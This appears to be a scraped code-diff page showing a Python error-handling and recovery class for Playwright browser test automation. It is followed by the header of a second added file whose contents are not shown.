+
|
| 7 |
+
Author: Mejbaur Bahar Fagun
|
| 8 |
+
Role: Software Engineer in Test
|
| 9 |
+
LinkedIn: https://www.linkedin.com/in/mejbaur/
|
| 10 |
+
"""
|
| 11 |
+
|
| 12 |
+
import asyncio
|
| 13 |
+
import logging
|
| 14 |
+
import traceback
|
| 15 |
+
import json
|
| 16 |
+
from typing import Dict, List, Optional, Any, Tuple
|
| 17 |
+
from dataclasses import dataclass
|
| 18 |
+
from datetime import datetime
|
| 19 |
+
from playwright.async_api import Page, Locator, Error as PlaywrightError
|
| 20 |
+
|
| 21 |
+
logger = logging.getLogger(__name__)
|
| 22 |
+
|
| 23 |
+
@dataclass
|
| 24 |
+
class DetailedError:
|
| 25 |
+
"""Detailed error information with context."""
|
| 26 |
+
error_type: str
|
| 27 |
+
error_message: str
|
| 28 |
+
element_info: Dict[str, Any]
|
| 29 |
+
page_context: Dict[str, Any]
|
| 30 |
+
action_context: Dict[str, Any]
|
| 31 |
+
suggested_fix: str
|
| 32 |
+
severity: str # low, medium, high, critical
|
| 33 |
+
timestamp: datetime
|
| 34 |
+
stack_trace: str
|
| 35 |
+
|
| 36 |
+
class AdvancedErrorHandler:
|
| 37 |
+
"""Advanced error handling and debugging system."""
|
| 38 |
+
|
| 39 |
+
def __init__(self, page: Page):
|
| 40 |
+
self.page = page
|
| 41 |
+
self.error_history: List[DetailedError] = []
|
| 42 |
+
self.recovery_attempts: Dict[str, int] = {}
|
| 43 |
+
|
| 44 |
+
async def handle_action_error(self, error: Exception, action: str,
|
| 45 |
+
element_index: Optional[int] = None,
|
| 46 |
+
element_selector: Optional[str] = None,
|
| 47 |
+
input_value: Optional[str] = None) -> DetailedError:
|
| 48 |
+
"""Handle action errors with detailed context and suggestions."""
|
| 49 |
+
|
| 50 |
+
# Extract element information
|
| 51 |
+
element_info = await self._extract_element_info(element_index, element_selector)
|
| 52 |
+
|
| 53 |
+
# Extract page context
|
| 54 |
+
page_context = await self._extract_page_context()
|
| 55 |
+
|
| 56 |
+
# Extract action context
|
| 57 |
+
action_context = {
|
| 58 |
+
"action": action,
|
| 59 |
+
"element_index": element_index,
|
| 60 |
+
"element_selector": element_selector,
|
| 61 |
+
"input_value": input_value,
|
| 62 |
+
"timestamp": datetime.now().isoformat()
|
| 63 |
+
}
|
| 64 |
+
|
| 65 |
+
# Analyze error and generate suggestions
|
| 66 |
+
error_analysis = self._analyze_error(error, element_info, page_context, action_context)
|
| 67 |
+
|
| 68 |
+
# Create detailed error
|
| 69 |
+
detailed_error = DetailedError(
|
| 70 |
+
error_type=type(error).__name__,
|
| 71 |
+
error_message=str(error),
|
| 72 |
+
element_info=element_info,
|
| 73 |
+
page_context=page_context,
|
| 74 |
+
action_context=action_context,
|
| 75 |
+
suggested_fix=error_analysis["suggested_fix"],
|
| 76 |
+
severity=error_analysis["severity"],
|
| 77 |
+
timestamp=datetime.now(),
|
| 78 |
+
stack_trace=traceback.format_exc()
|
| 79 |
+
)
|
| 80 |
+
|
| 81 |
+
self.error_history.append(detailed_error)
|
| 82 |
+
|
| 83 |
+
# Log detailed error
|
| 84 |
+
self._log_detailed_error(detailed_error)
|
| 85 |
+
|
| 86 |
+
return detailed_error
|
| 87 |
+
|
| 88 |
+
async def _extract_element_info(self, element_index: Optional[int],
|
| 89 |
+
element_selector: Optional[str]) -> Dict[str, Any]:
|
| 90 |
+
"""Extract detailed information about the element that caused the error."""
|
| 91 |
+
element_info = {
|
| 92 |
+
"index": element_index,
|
| 93 |
+
"selector": element_selector,
|
| 94 |
+
"exists": False,
|
| 95 |
+
"visible": False,
|
| 96 |
+
"enabled": False,
|
| 97 |
+
"tag_name": None,
|
| 98 |
+
"attributes": {},
|
| 99 |
+
"text_content": None,
|
| 100 |
+
"bounding_box": None,
|
| 101 |
+
"similar_elements": []
|
| 102 |
+
}
|
| 103 |
+
|
| 104 |
+
try:
|
| 105 |
+
if element_index is not None:
|
| 106 |
+
# Get element by index
|
| 107 |
+
elements = await self.page.locator("input, button, select, textarea").all()
|
| 108 |
+
if 0 <= element_index < len(elements):
|
| 109 |
+
element = elements[element_index]
|
| 110 |
+
element_info.update(await self._get_element_details(element))
|
| 111 |
+
|
| 112 |
+
# Find similar elements
|
| 113 |
+
element_info["similar_elements"] = await self._find_similar_elements(element)
|
| 114 |
+
|
| 115 |
+
elif element_selector:
|
| 116 |
+
# Get element by selector
|
| 117 |
+
element = self.page.locator(element_selector).first
|
| 118 |
+
if await element.count() > 0:
|
| 119 |
+
element_info.update(await self._get_element_details(element))
|
| 120 |
+
element_info["similar_elements"] = await self._find_similar_elements(element)
|
| 121 |
+
|
| 122 |
+
except Exception as e:
|
| 123 |
+
element_info["extraction_error"] = str(e)
|
| 124 |
+
|
| 125 |
+
return element_info
|
| 126 |
+
|
| 127 |
+
async def _get_element_details(self, element: Locator) -> Dict[str, Any]:
|
| 128 |
+
"""Get detailed information about a specific element."""
|
| 129 |
+
details = {}
|
| 130 |
+
|
| 131 |
+
try:
|
| 132 |
+
details["exists"] = await element.count() > 0
|
| 133 |
+
if details["exists"]:
|
| 134 |
+
details["visible"] = await element.is_visible()
|
| 135 |
+
details["enabled"] = await element.is_enabled()
|
| 136 |
+
details["tag_name"] = await element.evaluate("el => el.tagName")
|
| 137 |
+
details["text_content"] = await element.text_content()
|
| 138 |
+
|
| 139 |
+
# Get attributes
|
| 140 |
+
attributes = await element.evaluate("el => { const attrs = {}; for (let attr of el.attributes) { attrs[attr.name] = attr.value; } return attrs; }")
|
| 141 |
+
details["attributes"] = attributes
|
| 142 |
+
|
| 143 |
+
# Get bounding box
|
| 144 |
+
try:
|
| 145 |
+
bbox = await element.bounding_box()
|
| 146 |
+
details["bounding_box"] = bbox
|
| 147 |
+
except:
|
| 148 |
+
details["bounding_box"] = None
|
| 149 |
+
|
| 150 |
+
except Exception as e:
|
| 151 |
+
details["error"] = str(e)
|
| 152 |
+
|
| 153 |
+
return details
|
| 154 |
+
|
| 155 |
+
async def _find_similar_elements(self, target_element: Locator) -> List[Dict[str, Any]]:
|
| 156 |
+
"""Find similar elements on the page."""
|
| 157 |
+
similar_elements = []
|
| 158 |
+
|
| 159 |
+
try:
|
| 160 |
+
# Get all interactive elements
|
| 161 |
+
all_elements = await self.page.locator("input, button, select, textarea, a").all()
|
| 162 |
+
|
| 163 |
+
for i, element in enumerate(all_elements):
|
| 164 |
+
try:
|
| 165 |
+
element_details = await self._get_element_details(element)
|
| 166 |
+
if element_details.get("exists"):
|
| 167 |
+
similar_elements.append({
|
| 168 |
+
"index": i,
|
| 169 |
+
"tag_name": element_details.get("tag_name"),
|
| 170 |
+
"attributes": element_details.get("attributes", {}),
|
| 171 |
+
"text_content": element_details.get("text_content"),
|
| 172 |
+
"visible": element_details.get("visible", False)
|
| 173 |
+
})
|
| 174 |
+
except:
|
| 175 |
+
continue
|
| 176 |
+
|
| 177 |
+
except Exception as e:
|
| 178 |
+
similar_elements.append({"error": str(e)})
|
| 179 |
+
|
| 180 |
+
return similar_elements[:10] # Limit to 10 similar elements
|
| 181 |
+
|
| 182 |
+
async def _extract_page_context(self) -> Dict[str, Any]:
|
| 183 |
+
"""Extract current page context information."""
|
| 184 |
+
context = {
|
| 185 |
+
"url": None,
|
| 186 |
+
"title": None,
|
| 187 |
+
"form_count": 0,
|
| 188 |
+
"input_count": 0,
|
| 189 |
+
"button_count": 0,
|
| 190 |
+
"page_loaded": False,
|
| 191 |
+
"viewport_size": None,
|
| 192 |
+
"user_agent": None
|
| 193 |
+
}
|
| 194 |
+
|
| 195 |
+
try:
|
| 196 |
+
context["url"] = self.page.url
|
| 197 |
+
context["title"] = await self.page.title()
|
| 198 |
+
context["form_count"] = await self.page.locator("form").count()
|
| 199 |
+
context["input_count"] = await self.page.locator("input").count()
|
| 200 |
+
context["button_count"] = await self.page.locator("button").count()
|
| 201 |
+
context["page_loaded"] = True
|
| 202 |
+
|
| 203 |
+
# Get viewport size
|
| 204 |
+
viewport = await self.page.viewport_size()
|
| 205 |
+
if viewport:
|
| 206 |
+
context["viewport_size"] = f"{viewport['width']}x{viewport['height']}"
|
| 207 |
+
|
| 208 |
+
# Get user agent
|
| 209 |
+
context["user_agent"] = await self.page.evaluate("navigator.userAgent")
|
| 210 |
+
|
| 211 |
+
except Exception as e:
|
| 212 |
+
context["extraction_error"] = str(e)
|
| 213 |
+
|
| 214 |
+
return context
|
| 215 |
+
|
| 216 |
+
def _analyze_error(self, error: Exception, element_info: Dict[str, Any],
|
| 217 |
+
page_context: Dict[str, Any], action_context: Dict[str, Any]) -> Dict[str, Any]:
|
| 218 |
+
"""Analyze error and provide intelligent suggestions."""
|
| 219 |
+
|
| 220 |
+
error_message = str(error).lower()
|
| 221 |
+
error_type = type(error).__name__
|
| 222 |
+
|
| 223 |
+
# Determine severity
|
| 224 |
+
severity = "medium"
|
| 225 |
+
if "timeout" in error_message or "waiting" in error_message:
|
| 226 |
+
severity = "high"
|
| 227 |
+
elif "not found" in error_message or "not visible" in error_message:
|
| 228 |
+
severity = "high"
|
| 229 |
+
elif "permission" in error_message or "blocked" in error_message:
|
| 230 |
+
severity = "critical"
|
| 231 |
+
elif "network" in error_message or "connection" in error_message:
|
| 232 |
+
severity = "high"
|
| 233 |
+
|
| 234 |
+
# Generate suggestions based on error type
|
| 235 |
+
suggested_fix = self._generate_suggestions(error_message, error_type, element_info, page_context, action_context)
|
| 236 |
+
|
| 237 |
+
return {
|
| 238 |
+
"severity": severity,
|
| 239 |
+
"suggested_fix": suggested_fix
|
| 240 |
+
}
|
| 241 |
+
|
| 242 |
+
def _generate_suggestions(self, error_message: str, error_type: str,
|
| 243 |
+
element_info: Dict[str, Any], page_context: Dict[str, Any],
|
| 244 |
+
action_context: Dict[str, Any]) -> str:
|
| 245 |
+
"""Generate intelligent suggestions for fixing the error."""
|
| 246 |
+
|
| 247 |
+
suggestions = []
|
| 248 |
+
|
| 249 |
+
# Element not found errors
|
| 250 |
+
if "not found" in error_message or "no element" in error_message:
|
| 251 |
+
suggestions.append("🔍 Element not found. Try these solutions:")
|
| 252 |
+
suggestions.append(" • Wait for the page to fully load")
|
| 253 |
+
suggestions.append(" • Check if the element selector is correct")
|
| 254 |
+
suggestions.append(" • Verify the element exists on the current page")
|
| 255 |
+
|
| 256 |
+
if element_info.get("similar_elements"):
|
| 257 |
+
suggestions.append(" • Similar elements found on page:")
|
| 258 |
+
for elem in element_info["similar_elements"][:3]:
|
| 259 |
+
if elem.get("tag_name"):
|
| 260 |
+
suggestions.append(f" - {elem['tag_name']}: {elem.get('text_content', 'No text')[:50]}")
|
| 261 |
+
|
| 262 |
+
# Element not visible errors
|
| 263 |
+
elif "not visible" in error_message or "not attached" in error_message:
|
| 264 |
+
suggestions.append("👁️ Element not visible. Try these solutions:")
|
| 265 |
+
suggestions.append(" • Scroll to the element first")
|
| 266 |
+
suggestions.append(" • Wait for animations to complete")
|
| 267 |
+
suggestions.append(" • Check if element is hidden by CSS")
|
| 268 |
+
suggestions.append(" • Try clicking a parent element first")
|
| 269 |
+
|
| 270 |
+
# Input text errors
|
| 271 |
+
elif "input text" in error_message or "failed to input" in error_message:
|
| 272 |
+
suggestions.append("⌨️ Input text failed. Try these solutions:")
|
| 273 |
+
suggestions.append(" • Clear the field first")
|
| 274 |
+
suggestions.append(" • Check if the field is enabled")
|
| 275 |
+
suggestions.append(" • Verify the field accepts text input")
|
| 276 |
+
suggestions.append(" • Try typing character by character")
|
| 277 |
+
|
| 278 |
+
if action_context.get("input_value"):
|
| 279 |
+
suggestions.append(f" • Input value was: '{action_context['input_value']}'")
|
| 280 |
+
|
| 281 |
+
# Click errors
|
| 282 |
+
elif "click" in error_message or "failed to click" in error_message:
|
| 283 |
+
suggestions.append("🖱️ Click failed. Try these solutions:")
|
| 284 |
+
suggestions.append(" • Wait for element to be clickable")
|
| 285 |
+
suggestions.append(" • Check if element is covered by another element")
|
| 286 |
+
suggestions.append(" • Try force clicking")
|
| 287 |
+
suggestions.append(" • Scroll to element before clicking")
|
| 288 |
+
|
| 289 |
+
# Timeout errors
|
| 290 |
+
elif "timeout" in error_message or "waiting" in error_message:
|
| 291 |
+
suggestions.append("⏰ Timeout occurred. Try these solutions:")
|
| 292 |
+
suggestions.append(" • Increase wait timeout")
|
| 293 |
+
suggestions.append(" • Check if page is still loading")
|
| 294 |
+
suggestions.append(" • Verify network connection")
|
| 295 |
+
suggestions.append(" • Try refreshing the page")
|
| 296 |
+
|
| 297 |
+
# Network errors
|
| 298 |
+
elif "network" in error_message or "connection" in error_message:
|
| 299 |
+
suggestions.append("🌐 Network error. Try these solutions:")
|
| 300 |
+
suggestions.append(" • Check internet connection")
|
| 301 |
+
suggestions.append(" • Verify the website is accessible")
|
| 302 |
+
suggestions.append(" • Try again in a few moments")
|
| 303 |
+
suggestions.append(" • Check for firewall/proxy issues")
|
| 304 |
+
|
| 305 |
+
# Generic suggestions
|
| 306 |
+
if not suggestions:
|
| 307 |
+
suggestions.append("🔧 General troubleshooting:")
|
| 308 |
+
suggestions.append(" • Refresh the page and try again")
|
| 309 |
+
suggestions.append(" • Check browser console for errors")
|
| 310 |
+
suggestions.append(" • Verify the website is working properly")
|
| 311 |
+
suggestions.append(" • Try a different approach or element")
|
| 312 |
+
|
| 313 |
+
# Add context-specific suggestions
|
| 314 |
+
if element_info.get("index") is not None:
|
| 315 |
+
suggestions.append(f" • Element index: {element_info['index']}")
|
| 316 |
+
|
| 317 |
+
if page_context.get("input_count", 0) > 0:
|
| 318 |
+
suggestions.append(f" • Page has {page_context['input_count']} input elements")
|
| 319 |
+
|
| 320 |
+
return "\n".join(suggestions)
|
| 321 |
+
|
| 322 |
+
def _log_detailed_error(self, error: DetailedError):
|
| 323 |
+
"""Log detailed error information."""
|
| 324 |
+
logger.error(f"🚨 Detailed Error Report:")
|
| 325 |
+
logger.error(f" Type: {error.error_type}")
|
| 326 |
+
logger.error(f" Message: {error.error_message}")
|
| 327 |
+
logger.error(f" Severity: {error.severity}")
|
| 328 |
+
logger.error(f" Element Index: {error.element_info.get('index', 'N/A')}")
|
| 329 |
+
logger.error(f" Element Selector: {error.element_info.get('selector', 'N/A')}")
|
| 330 |
+
logger.error(f" Element Exists: {error.element_info.get('exists', 'N/A')}")
|
| 331 |
+
logger.error(f" Element Visible: {error.element_info.get('visible', 'N/A')}")
|
| 332 |
+
logger.error(f" Page URL: {error.page_context.get('url', 'N/A')}")
|
| 333 |
+
logger.error(f" Page Title: {error.page_context.get('title', 'N/A')}")
|
| 334 |
+
logger.error(f" Suggested Fix:\n{error.suggested_fix}")
|
| 335 |
+
|
| 336 |
+
if error.severity in ["high", "critical"]:
|
| 337 |
+
logger.error(f" Stack Trace:\n{error.stack_trace}")
|
| 338 |
+
|
| 339 |
+
async def attempt_error_recovery(self, error: DetailedError) -> bool:
|
| 340 |
+
"""Attempt to recover from an error automatically."""
|
| 341 |
+
recovery_key = f"{error.error_type}_{error.action_context.get('action', 'unknown')}"
|
| 342 |
+
|
| 343 |
+
# Limit recovery attempts
|
| 344 |
+
if self.recovery_attempts.get(recovery_key, 0) >= 3:
|
| 345 |
+
logger.warning(f"⚠️ Maximum recovery attempts reached for {recovery_key}")
|
| 346 |
+
return False
|
| 347 |
+
|
| 348 |
+
self.recovery_attempts[recovery_key] = self.recovery_attempts.get(recovery_key, 0) + 1
|
| 349 |
+
|
| 350 |
+
try:
|
| 351 |
+
# Recovery strategies based on error type
|
| 352 |
+
if "not found" in error.error_message.lower():
|
| 353 |
+
return await self._recover_element_not_found(error)
|
| 354 |
+
elif "not visible" in error.error_message.lower():
|
| 355 |
+
return await self._recover_element_not_visible(error)
|
| 356 |
+
elif "input text" in error.error_message.lower():
|
| 357 |
+
return await self._recover_input_text_error(error)
|
| 358 |
+
elif "timeout" in error.error_message.lower():
|
| 359 |
+
return await self._recover_timeout_error(error)
|
| 360 |
+
|
| 361 |
+
except Exception as recovery_error:
|
| 362 |
+
logger.error(f"❌ Recovery attempt failed: {recovery_error}")
|
| 363 |
+
|
| 364 |
+
return False
|
| 365 |
+
|
| 366 |
+
async def _recover_element_not_found(self, error: DetailedError) -> bool:
|
| 367 |
+
"""Recover from element not found error."""
|
| 368 |
+
try:
|
| 369 |
+
# Wait a bit for dynamic content
|
| 370 |
+
await asyncio.sleep(2)
|
| 371 |
+
|
| 372 |
+
# Try to find similar elements
|
| 373 |
+
if error.element_info.get("similar_elements"):
|
| 374 |
+
for elem in error.element_info["similar_elements"][:3]:
|
| 375 |
+
if elem.get("visible") and elem.get("tag_name"):
|
| 376 |
+
logger.info(f"🔄 Trying similar element: {elem['tag_name']}")
|
| 377 |
+
return True
|
| 378 |
+
|
| 379 |
+
return False
|
| 380 |
+
except:
|
| 381 |
+
return False
|
| 382 |
+
|
| 383 |
+
async def _recover_element_not_visible(self, error: DetailedError) -> bool:
|
| 384 |
+
"""Recover from element not visible error."""
|
| 385 |
+
try:
|
| 386 |
+
# Scroll to element
|
| 387 |
+
if error.element_info.get("index") is not None:
|
| 388 |
+
elements = await self.page.locator("input, button, select, textarea").all()
|
| 389 |
+
if 0 <= error.element_info["index"] < len(elements):
|
| 390 |
+
await elements[error.element_info["index"]].scroll_into_view_if_needed()
|
| 391 |
+
await asyncio.sleep(1)
|
| 392 |
+
return True
|
| 393 |
+
return False
|
| 394 |
+
except:
|
| 395 |
+
return False
|
| 396 |
+
|
| 397 |
+
async def _recover_input_text_error(self, error: DetailedError) -> bool:
|
| 398 |
+
"""Recover from input text error."""
|
| 399 |
+
try:
|
| 400 |
+
# Clear field first
|
| 401 |
+
if error.element_info.get("index") is not None:
|
| 402 |
+
elements = await self.page.locator("input, textarea").all()
|
| 403 |
+
if 0 <= error.element_info["index"] < len(elements):
|
| 404 |
+
await elements[error.element_info["index"]].clear()
|
| 405 |
+
await asyncio.sleep(0.5)
|
| 406 |
+
return True
|
| 407 |
+
return False
|
| 408 |
+
except:
|
| 409 |
+
return False
|
| 410 |
+
|
| 411 |
+
async def _recover_timeout_error(self, error: DetailedError) -> bool:
|
| 412 |
+
"""Recover from timeout error."""
|
| 413 |
+
try:
|
| 414 |
+
# Wait longer
|
| 415 |
+
await asyncio.sleep(5)
|
| 416 |
+
return True
|
| 417 |
+
except:
|
| 418 |
+
return False
|
| 419 |
+
|
| 420 |
+
def get_error_summary(self) -> Dict[str, Any]:
|
| 421 |
+
"""Get summary of all errors encountered."""
|
| 422 |
+
if not self.error_history:
|
| 423 |
+
return {"message": "No errors recorded"}
|
| 424 |
+
|
| 425 |
+
error_counts = {}
|
| 426 |
+
severity_counts = {}
|
| 427 |
+
|
| 428 |
+
for error in self.error_history:
|
| 429 |
+
error_type = error.error_type
|
| 430 |
+
severity = error.severity
|
| 431 |
+
|
| 432 |
+
error_counts[error_type] = error_counts.get(error_type, 0) + 1
|
| 433 |
+
severity_counts[severity] = severity_counts.get(severity, 0) + 1
|
| 434 |
+
|
| 435 |
+
return {
|
| 436 |
+
"total_errors": len(self.error_history),
|
| 437 |
+
"error_types": error_counts,
|
| 438 |
+
"severity_distribution": severity_counts,
|
| 439 |
+
"recovery_attempts": self.recovery_attempts,
|
| 440 |
+
"recent_errors": [
|
| 441 |
+
{
|
| 442 |
+
"type": e.error_type,
|
| 443 |
+
"message": e.error_message,
|
| 444 |
+
"severity": e.severity,
|
| 445 |
+
"timestamp": e.timestamp.isoformat(),
|
| 446 |
+
"suggested_fix": e.suggested_fix
|
| 447 |
+
}
|
| 448 |
+
for e in self.error_history[-5:] # Last 5 errors
|
| 449 |
+
]
|
| 450 |
+
}
|
src/utils/advanced_testing.py
ADDED
|
@@ -0,0 +1,1015 @@
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
